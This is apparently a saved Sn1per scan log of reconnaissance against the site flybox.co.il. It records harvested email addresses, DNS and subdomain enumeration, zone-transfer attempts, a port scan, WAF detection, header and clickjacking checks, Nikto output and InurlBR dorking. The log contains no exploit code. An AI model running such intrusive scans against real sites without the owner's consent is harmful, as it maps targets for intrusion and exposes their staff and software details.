changed:      Managing Registrar 20130924
changed:      Managing Registrar 20170518
changed:      Managing Registrar 20170716

registrar name: InterSpace Ltd
registrar info: http://www.internic.co.il

% Rights to the data above are restricted by copyright.
[92m + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +[0m

*******************************************************************
*                                                                 *
* | |_| |__   ___    /\  /\__ _ _ ____   _____  ___| |_ ___ _ __  *
* | __| '_ \ / _ \  / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
* | |_| | | |  __/ / __  / (_| | |   \ V /  __/\__ \ ||  __/ |    *
*  \__|_| |_|\___| \/ /_/ \__,_|_|    \_/ \___||___/\__\___|_|    *
*                                                                 *
* TheHarvester Ver. 2.7                                           *
* Coded by Christian Martorella                                   *
* Edge-Security Research                                          *
* cmartorella@edge-security.com                                   *
*******************************************************************


Full harvest..
[-] Searching in Google..
	Searching 0 results...
	Searching 100 results...
	Searching 200 results...
[-] Searching in PGP Key server..
[-] Searching in Bing..
	Searching 50 results...
	Searching 100 results...
	Searching 150 results...
	Searching 200 results...
[-] Searching in Exalead..
	Searching 50 results...
	Searching 100 results...
	Searching 150 results...
	Searching 200 results...
	Searching 250 results...


[+] Emails found:
------------------
info@flybox.co.il
liron@flybox.co.il

[+] Hosts found in search engines:
------------------------------------
[-] Resolving hostnames IPs...
104.31.75.239:www.flybox.co.il
[+] Virtual hosts:
==================
104.31.75.239	hoc
104.31.75.239	www.flybox.co.il
104.31.75.239	www.fedsmith
104.31.75.239	www.isadanislam.org
104.31.75.239	hocltd.com
104.31.75.239	www.fedsmith.com

******************************************************
*     /\/\   ___| |_ __ _  __ _  ___   ___  / _(_) | *
*    /    \ / _ \ __/ _` |/ _` |/ _ \ / _ \| |_| | | *
*   / /\/\ \  __/ || (_| | (_| | (_) | (_) |  _| | | *
*   \/    \/\___|\__\__,_|\__, |\___/ \___/|_| |_|_| *
*                         |___/                      *
* Metagoofil Ver 2.2                                 *
* Christian Martorella                               *
* Edge-Security.com                                  *
* cmartorella_at_edge-security.com                   *
******************************************************

[-] Starting online search...

[-] Searching for doc files, with a limit of 200
	Searching 100 results...
	Searching 200 results...
Results: 0 files found
Starting to download 50 of them:
----------------------------------------


[-] Searching for pdf files, with a limit of 200
	Searching 100 results...
	Searching 200 results...
Results: 0 files found
Starting to download 50 of them:
----------------------------------------


[-] Searching for xls files, with a limit of 200
	Searching 100 results...
	Searching 200 results...
Results: 0 files found
Starting to download 50 of them:
----------------------------------------


[-] Searching for csv files, with a limit of 200
	Searching 100 results...
	Searching 200 results...
Results: 0 files found
Starting to download 50 of them:
----------------------------------------


[-] Searching for txt files, with a limit of 200
	Searching 100 results...
	Searching 200 results...
Results: 0 files found
Starting to download 50 of them:
----------------------------------------

processing
user
email

[+] List of users found:
--------------------------

[+] List of software found:
-----------------------------

[+] List of paths and servers found:
---------------------------------------

[+] List of e-mails found:
----------------------------
[92m + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +[0m

; <<>> DiG 9.11.2-5-Debian <<>> -x flybox.co.il
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 61983
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;il.co.flybox.in-addr.arpa.	IN	PTR

;; AUTHORITY SECTION:
in-addr.arpa.		3600	IN	SOA	b.in-addr-servers.arpa. nstld.iana.org. 2017102519 1800 900 604800 3600

;; Query time: 489 msec
;; SERVER: 192.168.1.254#53(192.168.1.254)
;; WHEN: Sun Dec 31 03:23:31 EST 2017
;; MSG SIZE  rcvd: 122

dnsenum VERSION:1.2.4
[1;34m
-----   flybox.co.il   -----
[0m[1;31m

Host's addresses:
__________________

[0mflybox.co.il.                            211      IN    A        104.31.74.239
flybox.co.il.                            211      IN    A        104.31.75.239
[1;31m

Name Servers:
______________

[0mvin.ns.cloudflare.com.                   84028    IN    A        173.245.59.245
athena.ns.cloudflare.com.                67779    IN    A        173.245.58.72
[1;31m

Mail (MX) Servers:
___________________

[0maspmx3.googlemail.com.                   293      IN    A        209.85.202.26
alt1.aspmx.l.google.com.                 293      IN    A        64.233.186.26
aspmx.l.google.com.                      293      IN    A        209.85.232.26
aspmx2.googlemail.com.                   293      IN    A        64.233.186.26
alt2.aspmx.l.google.com.                 293      IN    A        209.85.202.26
[1;31m

Trying Zone Transfers and getting Bind Versions:
_________________________________________________

[0m
Trying Zone Transfer for flybox.co.il on vin.ns.cloudflare.com ...

Trying Zone Transfer for flybox.co.il on athena.ns.cloudflare.com ...

brute force file not specified, bay.
[92m + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +[0m
[91m
                 ____        _     _ _     _   _____
                / ___| _   _| |__ | (_)___| |_|___ / _ __
                \___ \| | | | '_ \| | / __| __| |_ \| '__|
                 ___) | |_| | |_) | | \__ \ |_ ___) | |
                |____/ \__,_|_.__/|_|_|___/\__|____/|_|[0m[93m

                # Coded By Ahmed Aboul-Ela - @aboul3la

[94m[-] Enumerating subdomains now for flybox.co.il[0m
[93m[-] verbosity is enabled, will show the subdomains results in realtime[0m
[92m[-] Searching now in Baidu..[0m
[92m[-] Searching now in Yahoo..[0m
[92m[-] Searching now in Google..[0m
[92m[-] Searching now in Bing..[0m
[92m[-] Searching now in Ask..[0m
[92m[-] Searching now in Netcraft..[0m
[92m[-] Searching now in DNSdumpster..[0m
[92m[-] Searching now in Virustotal..[0m
[92m[-] Searching now in ThreatCrowd..[0m
[92m[-] Searching now in SSL Certificates..[0m
[92m[-] Searching now in PassiveDNS..[0m
[91mSSL Certificates: [0mvip.flybox.co.il
[91mSSL Certificates: [0mwww.flybox.co.il
[91mYahoo: [0mwww.flybox.co.il
[91mYahoo: [0mvip.flybox.co.il
[91mVirustotal: [0mvip.flybox.co.il
[91mVirustotal: [0mlanding.flybox.co.il
[91mVirustotal: [0mwww.flybox.co.il
[91mDNSdumpster: [0mwww.flybox.co.il
[91mBing: [0mvip.flybox.co.il
[91mGoogle: [0mvip.flybox.co.il
[93m[-] Saving results to file: [0m[91m/usr/share/sniper/loot/domains/domains-flybox.co.il.txt[0m
[93m[-] Total Unique Subdomains Found: 3[0m
[92mwww.flybox.co.il[0m
[92mlanding.flybox.co.il[0m
[92mvip.flybox.co.il[0m

[91m ââââŠââââŠâââââŠ âŠ[0m
[91m â  â âŠâ â ââââ ââ£[0m
[91m ââââ©ââ â©oââââ© â©[0m
[91m + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +[0m
[94m
*.flybox.co.il
vip.flybox.co.il
www.flybox.co.il
[91m [+] Domains saved to: /usr/share/sniper/loot/domains/domains-flybox.co.il-full.txt
[0m
[92m + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +[0m
[92m + -- ----------------------------=[Checking Email Security]=----------------- -- +[0m

[92m + -- ----------------------------=[Pinging host]=---------------------------- -- +[0m
PING flybox.co.il(2400:cb00:2048:1::681f:4bef (2400:cb00:2048:1::681f:4bef)) 56 data bytes
64 bytes from 2400:cb00:2048:1::681f:4bef (2400:cb00:2048:1::681f:4bef): icmp_seq=1 ttl=60 time=29.3 ms

--- flybox.co.il ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 29.300/29.300/29.300/0.000 ms

[92m + -- ----------------------------=[Running TCP port scan]=------------------- -- +[0m

Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-31 03:24 EST
Nmap scan report for flybox.co.il (104.31.74.239)
Host is up (0.30s latency).
Other addresses for flybox.co.il (not scanned): 2400:cb00:2048:1::681f:4aef 2400:cb00:2048:1::681f:4bef 104.31.75.239
Not shown: 468 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
80/tcp   open  http
443/tcp  open  https
8080/tcp open  http-proxy
8443/tcp open  https-alt
8880/tcp open  cddbp-alt

Nmap done: 1 IP address (1 host up) scanned in 17.31 seconds

[92m + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +[0m
[91m + -- --=[Port 21 closed... skipping.[0m
[91m + -- --=[Port 22 closed... skipping.[0m
[91m + -- --=[Port 23 closed... skipping.[0m
[91m + -- --=[Port 25 closed... skipping.[0m
[91m + -- --=[Port 53 closed... skipping.[0m
[91m + -- --=[Port 79 closed... skipping.[0m
[93m + -- --=[Port 80 opened... running tests...[0m
[92m + -- ----------------------------=[Checking for WAF]=------------------------ -- +[0m

                                 ^     ^
        _   __  _   ____ _   __  _    _   ____
       ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
      | V V // o // _/ | V V // 0 // 0 // _/
      |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
                                <
                                 ...'

    WAFW00F - Web Application Firewall Detection Tool

    By Sandro Gauci && Wendel G. Henrique

Checking http://flybox.co.il
The site http://flybox.co.il is behind a CloudFlare
Number of requests: 1

[92m + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +[0m
[1m[34mhttp://flybox.co.il[0m [301 Moved Permanently] [1m[37mCloudFlare[0m, [1m[37mCookies[0m[[37m__cfduid[0m], [1m[37mCountry[0m[[37mUNITED STATES[0m][[1m[31mUS[0m], [1m[37mHTTPServer[0m[[1m[36mcloudflare[0m], [1m[37mHttpOnly[0m[[37m__cfduid[0m], [1m[37mIP[0m[[37m104.31.75.239[0m], [1m[37mRedirectLocation[0m[[37mhttps://flybox.co.il/[0m], [1m[37mTitle[0m[[1m[33m301 Moved Permanently[0m], [1m[37mUncommonHeaders[0m[[37mcf-ray[0m]
[1m[34mhttps://flybox.co.il/[0m [301 Moved Permanently] [1m[37mCloudFlare[0m, [1m[37mCookies[0m[[37mPHPSESSID,__cfduid,qtrans_front_language[0m], [1m[37mCountry[0m[[37mUNITED STATES[0m][[1m[31mUS[0m], [1m[37mHTTPServer[0m[[1m[36mcloudflare[0m], [1m[37mHttpOnly[0m[[37m__cfduid[0m], [1m[37mIP[0m[[37m104.31.75.239[0m], [1m[37mPHP[0m[[1m[32m7.0.13[0m], [1m[37mRedirectLocation[0m[[37mhttps://www.flybox.co.il/[0m], [1m[37mUncommonHeaders[0m[[37mcf-ray[0m], [1m[37mX-Powered-By[0m[[37mPHP/7.0.13[0m]
[1m[34mhttps://www.flybox.co.il/[0m [200 OK] [1m[37mCloudFlare[0m, [1m[37mCookies[0m[[37mPHPSESSID,__cfduid,qtrans_front_language[0m], [1m[37mCountry[0m[[37mUNITED STATES[0m][[1m[31mUS[0m], [1m[37mFrame[0m, [1m[37mGoogle-Analytics[0m[[1m[32mUniversal[0m][[1m[36mUA-87930745-1[0m], [1m[37mHTML5[0m, [1m[37mHTTPServer[0m[[1m[36mcloudflare[0m], [1m[37mHttpOnly[0m[[37m__cfduid[0m], [1m[37mIP[0m[[37m104.31.75.239[0m], [1m[37mJQuery[0m[[1m[32m1.0.5,2.1.3[0m], [1m[37mMetaGenerator[0m[[37mWooCommerce 2.5.5,WordPress 4.5.6,qTranslate-X 3.4.6.8[0m], [1m[37mOpen-Graph-Protocol[0m[[1m[32mwebsite[0m], [1m[37mPHP[0m[[1m[32m7.0.13[0m], [1m[37mScript[0m[[37mapplication/ld+json,text/javascript[0m], [1m[37mTitle[0m[[1m[33mFlybox - ×××š×§×Š×× ×××š×× ××× ×××©×€×× ×××××š××! ×× ××š×ª ×š×× ××××¢× ×××©×š××[0m], [1m[37mUncommonHeaders[0m[[37mlink,access-control-allow-origin,cf-ray[0m], [1m[37mVimeo[0m, [1m[37mWordPress[0m[[1m[32m4.5.6[0m], [1m[37mX-Powered-By[0m[[37mPHP/7.0.13[0m], [1m[37mX-UA-Compatible[0m[[37mIE=edge[0m]

[94m	__  ______ _____ [0m
[94m	\ \/ / ___|_   _|[0m
[94m	 \  /\___ \ | |  [0m
[94m	 /  \ ___) || |  [0m
[94m	/_/\_|____/ |_|  [0m

[94m+ -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield[0m
[94m+ -- --=[Target: flybox.co.il:80[0m
[92m+ -- --=[Site not vulnerable to Cross-Site Tracing![0m
[92m+ -- --=[Site not vulnerable to Host Header Injection![0m
[91m+ -- --=[Site vulnerable to Cross-Frame Scripting![0m
[91m+ -- --=[Site vulnerable to Clickjacking![0m

[93mHTTP/1.1 405 Not Allowed
Date: Sun, 31 Dec 2017 08:24:32 GMT
Content-Type: text/html
Content-Length: 177
Connection: close
Server: cloudflare-nginx
CF-RAY: -

<html>
<head><title>405 Not Allowed</title></head>
<body bgcolor="white">
<center><h1>405 Not Allowed</h1></center>
<hr><center>cloudflare-nginx</center>
</body>
</html>
[0m
[93mHTTP/1.1 301 Moved Permanently
Date: Sun, 31 Dec 2017 08:24:33 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d3b25843681417713efeeea362ec03e091514708673; expires=Mon, 31-Dec-18 08:24:33 GMT; path=/; domain=.flybox.co.il; HttpOnly
Location: https://flybox.co.il/
Server: cloudflare
CF-RAY: 3d5bd7d943b108e4-CDG

e5
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://flybox.co.il/">here</a>.</p>
</body></html>

0

[0m


[92m + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +[0m
[94m+ -- --=[Checking if X-Content options are enabled on flybox.co.il...[0m [93m

[94m+ -- --=[Checking if X-Frame options are enabled on flybox.co.il...[0m [93m

[94m+ -- --=[Checking if X-XSS-Protection header is enabled on flybox.co.il...[0m [93m

[94m+ -- --=[Checking HTTP methods on flybox.co.il...[0m [93m

[94m+ -- --=[Checking if TRACE method is enabled on flybox.co.il...[0m [93m

[94m+ -- --=[Checking for META tags on flybox.co.il...[0m [93m

[94m+ -- --=[Checking for open proxy on flybox.co.il...[0m [93m
  </div><!-- /#cf-wrapper -->

  <script type="text/javascript">
  window._cf_translation = {};


</script>

</body>
</html>

[94m+ -- --=[Enumerating software on flybox.co.il...[0m [93m
Server: cloudflare

[94m+ -- --=[Checking if Strict-Transport-Security is enabled on flybox.co.il...[0m [93m

[94m+ -- --=[Checking for Flash cross-domain policy on flybox.co.il...[0m [93m
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://flybox.co.il/crossdomain.xml">here</a>.</p>
</body></html>

[94m+ -- --=[Checking for Silverlight cross-domain policy on flybox.co.il...[0m [93m
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://flybox.co.il/clientaccesspolicy.xml">here</a>.</p>
</body></html>

[94m+ -- --=[Checking for HTML5 cross-origin resource sharing on flybox.co.il...[0m [93m

[94m+ -- --=[Retrieving robots.txt on flybox.co.il...[0m [93m
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://flybox.co.il/robots.txt">here</a>.</p>
</body></html>

[94m+ -- --=[Retrieving sitemap.xml on flybox.co.il...[0m [93m
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://flybox.co.il/sitemap.xml">here</a>.</p>
</body></html>

[94m+ -- --=[Checking cookie attributes on flybox.co.il...[0m [93m
Set-Cookie: __cfduid=d9bbe540dd477159e31148488172304ef1514708677; expires=Mon, 31-Dec-18 08:24:37 GMT; path=/; domain=.flybox.co.il; HttpOnly

[94m+ -- --=[Checking for ASP.NET Detailed Errors on flybox.co.il...[0m [93m
          jQuery("input#footernewsletter").removeClass("error")
    jQuery("input#footernewsletter").addClass("error")
            if( returned_data.result == 'error' ) {
<body class="rtl error404">

[0m
[92m + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +[0m
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          104.31.75.239
+ Target Hostname:    flybox.co.il
+ Target Port:        80
+ Start Time:         2017-12-31 03:24:41 (GMT-5)
---------------------------------------------------------------------------
+ Server: cloudflare
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'cf-ray' found, with contents: 3d5bd80e62396908-CDG
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ All CGI directories 'found', use '-C none' to test none
+ Server banner has changed from 'cloudflare' to 'cloudflare-nginx' which may suggest a WAF, load balancer or proxy is in place
+ Scan terminated:  17 error(s) and 3 item(s) reported on remote host
+ End Time:           2017-12-31 05:16:15 (GMT-5) (6694 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
[92m + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +[0m
[91m[+][0m Screenshot saved to /usr/share/sniper/loot/screenshots/flybox.co.il-port80.jpg
[92m + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +[0m
[92m + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +[0m

[1;35m    _____ [1;37m .701F. .iBR.   .7CL. .70BR.   .7BR. .7BR'''Cq.   .70BR.      [0;31m.1BR'''Yp, .8BR'''Cq.
[1;35m   (_____)[1;37m   01     01N.    C     01       C     01   .01.    01        [1;31m  01    Yb   01   .01.
[1;35m   (() ())[1;37m   01     C YCb   C     01       C     01   ,C9     01        [0;31m  01    dP   01   ,C9
[1;35m    \   / [1;37m   01     C  .CN. C     01       C     0101dC9      01        [1;31m  01'''bg.   0101dC9
[1;35m     \ /  [1;37m   01     C   .01.C     01       C     01  YC.      01      , [0;31m  01    .Y   01  YC.
[1;35m     /=\  [1;37m   01     C     Y01     YC.     ,C     01   .Cb.    01     ,C [1;31m  01    ,9   01   .Cb.
[1;35m    [___] [1;37m .J01L. .JCL.    YC      .b0101d'.   .J01L. .J01. .J01010101C [0;31m.J0101Cd9  .J01L. .J01./ [1;37m2.1

[1;37m__[ ! ] Neither war between hackers, nor peace for the system.
[1;37m__[ ! ] [02;31mhttp://blog.inurl.com.br
[1;37m__[ ! ] [02;31mhttp://fb.com/InurlBrasil
[1;37m__[ ! ] [02;31mhttp://twitter.com/@googleinurl[0m
[1;37m__[ ! ] [02;31mhttp://github.com/googleinurl[0m
[1;37m__[ ! ] [02;31mCurrent PHP version::[ [1;37m7.0.26-1 [02;31m][0m
[1;37m__[ ! ] [02;31mCurrent script owner::[ [1;37mroot [02;31m][0m
[1;37m__[ ! ] [02;31mCurrent uname::[ [1;37mLinux Kali 4.14.0-kali1-amd64 #1 SMP Debian 4.14.2-1kali1 (2017-12-04) x86_64 [02;31m][0m
[1;37m__[ ! ] [02;31mCurrent pwd::[ [1;37m/usr/share/sniper [02;31m][0m
[1;37m__[ ! ] [1;33mHelp: php inurlbr.php --help[0m
[1;37m------------------------------------------------------------------------------------------------------------------------[0m

[1;37m[ ! ] Starting SCANNER INURLBR 2.1 at [31-12-2017 05:18:24][0;37m
[ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program[0m

[1;37m[ INFO ][02;31m[ OUTPUT FILE ]::[1;37m [ /usr/share/sniper/output/inurlbr-flybox.co.il.txt  ][0m
[1;37m[ INFO ][0m[02;31m[ DORK ]::[1;37m[ site:flybox.co.il ]
[1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [1;37m{[0m
[1;37m[ INFO ][0m[02;31m[ ENGINE ]::[1;37m[ GOOGLE - www.google.vu ][0m

[1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [0m
[1;37m-[02;31m[[0;31m:::[02;31m][0m
[1;37m[ INFO ][0m[02;31m[ ENGINE ]::[1;37m[ GOOGLE API ][0m

[1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [0m
[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m
[1;37m[ INFO ][0m[02;31m[ ENGINE ]::[1;37m[ GOOGLE_GENERIC_RANDOM - www.google.com.cu ID: 003917828085772992913:gmoeray5sa8 ][0m

[1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [0m
[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m

[1;37m[ INFO ][0;31m[ TOTAL FOUND VALUES ]::[1;37m [ 100 ][0m

[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 0 / 100 [1;37m][0;37m-[05:18:36][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 1 / 100 [1;37m][0;37m-[05:18:37][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 2 / 100 [1;37m][0;37m-[05:18:38][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/events/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 3 / 100 [1;37m][0;37m-[05:18:38][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/××§×Š××¢× ××/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 4 / 100 [1;37m][0;37m-[05:18:38][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/restaurant/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 5 / 100 [1;37m][0;37m-[05:18:39][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/××_××××_××¢××£/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 6 / 100 [1;37m][0;37m-[05:18:39][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/××××/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 7 / 100 [1;37m][0;37m-[05:18:40][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/kids/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 8 / 100 [1;37m][0;37m-[05:18:40][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/terms/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 9 / 100 [1;37m][0;37m-[05:18:40][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/faq/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
